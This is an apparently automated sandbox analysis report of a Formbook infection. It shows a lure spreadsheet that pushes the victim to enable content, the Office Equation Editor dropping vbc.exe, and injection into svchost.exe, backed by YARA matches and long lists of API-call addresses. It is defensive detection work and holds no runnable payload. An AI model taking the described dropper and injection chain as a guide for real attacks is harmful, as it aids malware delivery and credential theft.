Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: document is protected 16 17 18 19 20 21 Open the document in If this document was 22 Mkrosof
Source: Screenshot number: 4	Screenshot OCR: protected documents the yellow bar above 25 26 27 28 :: " ~ 31 0 0 0 0 0 q 32 ~ 33 0 0 0 0 0

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181D0 NtCreateFile,	5_2_004181D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418280 NtReadFile,	5_2_00418280
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418300 NtClose,	5_2_00418300
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183B0 NtAllocateVirtualMemory,	5_2_004183B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181CE NtCreateFile,	5_2_004181CE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041827C NtReadFile,	5_2_0041827C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182CA NtReadFile,	5_2_004182CA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182FA NtClose,	5_2_004182FA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183AA NtAllocateVirtualMemory,	5_2_004183AA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C200C4 NtCreateFile,LdrInitializeThunk,	5_2_00C200C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C20048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00C20048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C20078 NtResumeThread,LdrInitializeThunk,	5_2_00C20078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C207AC NtCreateMutant,LdrInitializeThunk,	5_2_00C207AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1F9F0 NtClose,LdrInitializeThunk,	5_2_00C1F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1F900 NtReadFile,LdrInitializeThunk,	5_2_00C1F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_00C1FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_00C1FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_00C1FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_00C1FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_00C1FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_00C1FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_00C1FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FD8C NtDelayExecution,LdrInitializeThunk,	5_2_00C1FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_00C1FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_00C1FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FFB4 NtCreateSection,LdrInitializeThunk,	5_2_00C1FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C210D0 NtOpenProcessToken,	5_2_00C210D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C20060 NtQuerySection,	5_2_00C20060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C201D4 NtSetValueKey,	5_2_00C201D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C21148 NtOpenThread,	5_2_00C21148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C2010C NtOpenDirectoryObject,	5_2_00C2010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1F8CC NtWaitForSingleObject,	5_2_00C1F8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C21930 NtSetContextThread,	5_2_00C21930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1F938 NtWriteFile,	5_2_00C1F938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FAB8 NtQueryValueKey,	5_2_00C1FAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FA50 NtEnumerateValueKey,	5_2_00C1FA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FA20 NtQueryInformationFile,	5_2_00C1FA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FBE8 NtQueryVirtualMemory,	5_2_00C1FBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FB50 NtCreateKey,	5_2_00C1FB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C20C40 NtGetContextThread,	5_2_00C20C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FC48 NtSetInformationFile,	5_2_00C1FC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FC30 NtOpenProcess,	5_2_00C1FC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C21D80 NtSuspendThread,	5_2_00C21D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FD5C NtEnumerateKey,	5_2_00C1FD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FE24 NtWriteVirtualMemory,	5_2_00C1FE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FFFC NtCreateProcessEx,	5_2_00C1FFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C1FF34 NtQueueApcThread,	5_2_00C1FF34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E00C4 NtCreateFile,LdrInitializeThunk,	7_2_008E00C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E07AC NtCreateMutant,LdrInitializeThunk,	7_2_008E07AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DF9F0 NtClose,LdrInitializeThunk,	7_2_008DF9F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DF900 NtReadFile,LdrInitializeThunk,	7_2_008DF900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_008DFAB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_008DFAD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_008DFAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_008DFBB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFB50 NtCreateKey,LdrInitializeThunk,	7_2_008DFB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_008DFB68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_008DFC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFD8C NtDelayExecution,LdrInitializeThunk,	7_2_008DFD8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_008DFDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_008DFED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFFB4 NtCreateSection,LdrInitializeThunk,	7_2_008DFFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E10D0 NtOpenProcessToken,	7_2_008E10D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E0048 NtProtectVirtualMemory,	7_2_008E0048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E0060 NtQuerySection,	7_2_008E0060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E0078 NtResumeThread,	7_2_008E0078
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E01D4 NtSetValueKey,	7_2_008E01D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E010C NtOpenDirectoryObject,	7_2_008E010C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E1148 NtOpenThread,	7_2_008E1148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DF8CC NtWaitForSingleObject,	7_2_008DF8CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DF938 NtWriteFile,	7_2_008DF938
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E1930 NtSetContextThread,	7_2_008E1930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFA20 NtQueryInformationFile,	7_2_008DFA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFA50 NtEnumerateValueKey,	7_2_008DFA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFBE8 NtQueryVirtualMemory,	7_2_008DFBE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFC90 NtUnmapViewOfSection,	7_2_008DFC90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFC30 NtOpenProcess,	7_2_008DFC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFC48 NtSetInformationFile,	7_2_008DFC48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E0C40 NtGetContextThread,	7_2_008E0C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008E1D80 NtSuspendThread,	7_2_008E1D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFD5C NtEnumerateKey,	7_2_008DFD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFEA0 NtReadVirtualMemory,	7_2_008DFEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFE24 NtWriteVirtualMemory,	7_2_008DFE24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFFFC NtCreateProcessEx,	7_2_008DFFFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008DFF34 NtQueueApcThread,	7_2_008DFF34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000981D0 NtCreateFile,	7_2_000981D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00098280 NtReadFile,	7_2_00098280
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00098300 NtClose,	7_2_00098300
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000983B0 NtAllocateVirtualMemory,	7_2_000983B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000981CE NtCreateFile,	7_2_000981CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009827C NtReadFile,	7_2_0009827C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000982CA NtReadFile,	7_2_000982CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000982FA NtClose,	7_2_000982FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000983AA NtAllocateVirtualMemory,	7_2_000983AA

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D642C	4_2_002D642C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D6008	4_2_002D6008
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D0560	4_2_002D0560
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D21D0	4_2_002D21D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D36AA	4_2_002D36AA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D0D0A	4_2_002D0D0A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DAD71	4_2_002DAD71
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D4A40	4_2_002D4A40
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D4A50	4_2_002D4A50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C6B	5_2_00408C6B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C70	5_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BCF9	5_2_0041BCF9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D8F	5_2_00402D8F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C5AF	5_2_0041C5AF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B79D	5_2_0041B79D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BFB7	5_2_0041BFB7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C2E0C6	5_2_00C2E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C33040	5_2_00C33040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C4905A	5_2_00C4905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAD06D	5_2_00CAD06D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C5D005	5_2_00C5D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C2E2E9	5_2_00C2E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CD1238	5_2_00CD1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C2F3CF	5_2_00C2F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C563DB	5_2_00C563DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CD63BF	5_2_00CD63BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C37353	5_2_00C37353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C7A37B	5_2_00C7A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C32305	5_2_00C32305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C65485	5_2_00C65485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C41489	5_2_00C41489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C6D47D	5_2_00C6D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CB443E	5_2_00CB443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CB05E3	5_2_00CB05E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C4C5F0	5_2_00C4C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C76540	5_2_00C76540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C3351F	5_2_00C3351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C3E6C1	5_2_00C3E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C34680	5_2_00C34680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CD2622	5_2_00CD2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C7A634	5_2_00C7A634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C657C3	5_2_00C657C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CB579A	5_2_00CB579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C3C7BC	5_2_00C3C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAF8C4	5_2_00CAF8C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CCF8EE	5_2_00CCF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C3C85C	5_2_00C3C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C5286D	5_2_00C5286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C469FE	5_2_00C469FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CD098E	5_2_00CD098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C329B2	5_2_00C329B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CB394B	5_2_00CB394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CB5955	5_2_00CB5955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CE3A83	5_2_00CE3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CB6BCB	5_2_00CB6BCB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CBDBDA	5_2_00CBDBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C2FBD7	5_2_00C2FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CDCBA4	5_2_00CDCBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C57B00	5_2_00C57B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CCFDDD	5_2_00CCFDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C3CD5B	5_2_00C3CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C60D3B	5_2_00C60D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C4EE4C	5_2_00C4EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C62E2F	5_2_00C62E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA2FDC	5_2_00CA2FDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CCCFB1	5_2_00CCCFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C5DF7C	5_2_00C5DF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C40F3F	5_2_00C40F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008EE0C6	7_2_008EE0C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0091D005	7_2_0091D005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0090905A	7_2_0090905A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F3040	7_2_008F3040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0096D06D	7_2_0096D06D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008EE2E9	7_2_008EE2E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00991238	7_2_00991238
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_009963BF	7_2_009963BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008EF3CF	7_2_008EF3CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_009163DB	7_2_009163DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F2305	7_2_008F2305
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F7353	7_2_008F7353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0093A37B	7_2_0093A37B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00925485	7_2_00925485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00901489	7_2_00901489
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0097443E	7_2_0097443E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0092D47D	7_2_0092D47D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0090C5F0	7_2_0090C5F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_009705E3	7_2_009705E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F351F	7_2_008F351F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00936540	7_2_00936540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F4680	7_2_008F4680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008FE6C1	7_2_008FE6C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0093A634	7_2_0093A634
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00992622	7_2_00992622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0097579A	7_2_0097579A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008FC7BC	7_2_008FC7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_009257C3	7_2_009257C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0096F8C4	7_2_0096F8C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0098F8EE	7_2_0098F8EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008FC85C	7_2_008FC85C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0091286D	7_2_0091286D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0099098E	7_2_0099098E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F29B2	7_2_008F29B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_009069FE	7_2_009069FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00975955	7_2_00975955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0097394B	7_2_0097394B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_009A3A83	7_2_009A3A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0099CBA4	7_2_0099CBA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0097DBDA	7_2_0097DBDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008EFBD7	7_2_008EFBD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00917B00	7_2_00917B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0098FDDD	7_2_0098FDDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00920D3B	7_2_00920D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008FCD5B	7_2_008FCD5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00922E2F	7_2_00922E2F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0090EE4C	7_2_0090EE4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0098CFB1	7_2_0098CFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00962FDC	7_2_00962FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00900F3F	7_2_00900F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0091DF7C	7_2_0091DF7C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009C5AF	7_2_0009C5AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009B79E	7_2_0009B79E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00088C6B	7_2_00088C6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00088C70	7_2_00088C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009BCF9	7_2_0009BCF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00082D8F	7_2_00082D8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00082FB0	7_2_00082FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009BFB7	7_2_0009BFB7

Source: P. I.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 008EE2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0095F970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0093373B appears 245 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00933F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 008EDF5C appears 121 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C2E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C9F970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C2DF5C appears 123 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C7373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C73F92 appears 132 times

Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
